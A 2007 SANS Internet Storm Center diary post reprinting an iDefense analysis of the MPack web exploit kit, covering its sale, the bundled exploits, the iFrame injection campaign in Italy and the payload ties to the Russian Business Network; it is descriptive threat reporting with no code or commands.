http://isc.sans.org/diary.html?n&storyid=3015
MPack Analysis
Published: 2007-06-20,
Last Updated: 2007-06-20 21:42:28 UTC
by Marcus Sachs (Version: 1)
We mentioned a large MPack compromise in a diary two days ago. Since
then we've been accumulating more information about what is going on
behind the scenes. Earlier today VeriSign/iDefense released some pretty
good analysis of how it works, what the value of it is, and other
goodies. This summary does not exist online but has been spread via
email to the media and other outlets. Rather than trying to summarize
it, iDefense gave the Internet Storm Center permission to reprint it in
its entirety. Thanks, iDefense!
Greetings All,
MPack is the latest and greatest tool for sale on the Russian
Underground. $ash sells MPack for around $500-1,000. In a recent
posting $ash attempted to sell a "loader" for $300 and a kit for $1,000.
The author claims that attacks are 45-50 percent successful, including
the animated cursor exploit and many others, including ANI overflow,
MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow,
WinZip ActiveX Overflow, QuickTime Overflow (all these are $ash names
for exploits). Attacks from MPack , aka WebAttacker II, date back to
October 2006 and account for roughly 10 percent of web based
exploitation today according to one public source.
More than 10,000 referral domains exist in a recent MPack attack,
largely successful MPack attack in Italy, compromising at least 80,000
unique IP addresses. It is likely that cPanel exploitation took place on
host provider leading to injected iFrames on domains hosted on the
server. When a legitimate page with a hostile iFrame is loaded the tool
silently redirects the victim in an iFrame to an exploit page crafted by
MPack. This exploit page, in a very controlled manner, executes exploits
until exploitation is successful, and then installs malicious code of
the attacker's choice.
Torpig is one of the known payloads for MPack attacks to date. This
code relates back to the Russian Business Network (RBN), through which
many Internet-based attacks take place today. The RBN is a virtual safe
house for attacks out of Saint Petersburg, Russia, responsible for
Torpig and other malicious code attacks, phishing attacks, child
pornography and other illicit operations. The Italian hosts responsible
for most of the domains seen in a recent MPack attack are using cPanel,
a Web administration tool for clients. A zero-day cPanel attack took
place in the fall of 2006 leading up to the large scale vector mark-up
language (VML) attacks at that time. It appears likely that the Russian
authors of the cPanel exploit, Step57.info, who are also related to the
RBN used the exploit to compromise the Italian ISP and referral domains
used in the latest mPack attack.
MPack uses a command and control website interface for reporting of
MPack success. A JPEG screenshot of a recent attack is attached to this
message.
QUOTES
1. MPack is a powerful Web exploitation tool that claims about 50
percent success in attacks silently launched against Web browsers.
2. $ash is the primary Russian actor attempting to sell mPack on the
underground, for about $1,000 for the complete MPack kit.
3. MPack leverages multiple exploits, in a very controlled manner,
to compromise vulnerable computers. Exploits range from the recent
animated cursor (ANI) to QuickTime exploitation. The latest version of
mPack, .90, includes the following exploits:
MS06-014
MS06-006
MS06-044
MS06-071
MS06-057
WinZip ActiveX overflow
QuickTime overflow
MS07-017
4. The Russian Business Network (RBN) is one of the most notorious
criminal groups on the Internet today. A recent MPack attack installed
Torpig malicious code hosted on an RBN server. RBN is closely tied to
multiple attacks including Step57.info cPanel exploitation, VML,
phishing, child pornography, Torpig, Rustock, and many other criminal
attacks to date. Nothing good ever comes out of the Russian Business
Network net block.
5. MPack attacks experience high success, according to attack log
files analyzed by VeriSign-iDefense. In just a few hours more than
2,000 new victims reported to an MPack command and control website. A
recent attack, largely focused in the area of Italy, involved more than
80,000 unique IPs.
Ken Dunham
Senior Engineer
Director of the Rapid Response Team
VeriSign-iDefense
CISSP, GREM, GSEC, GCIH Gold Honors
Marcus H. Sachs
Director, SANS Internet Storm Center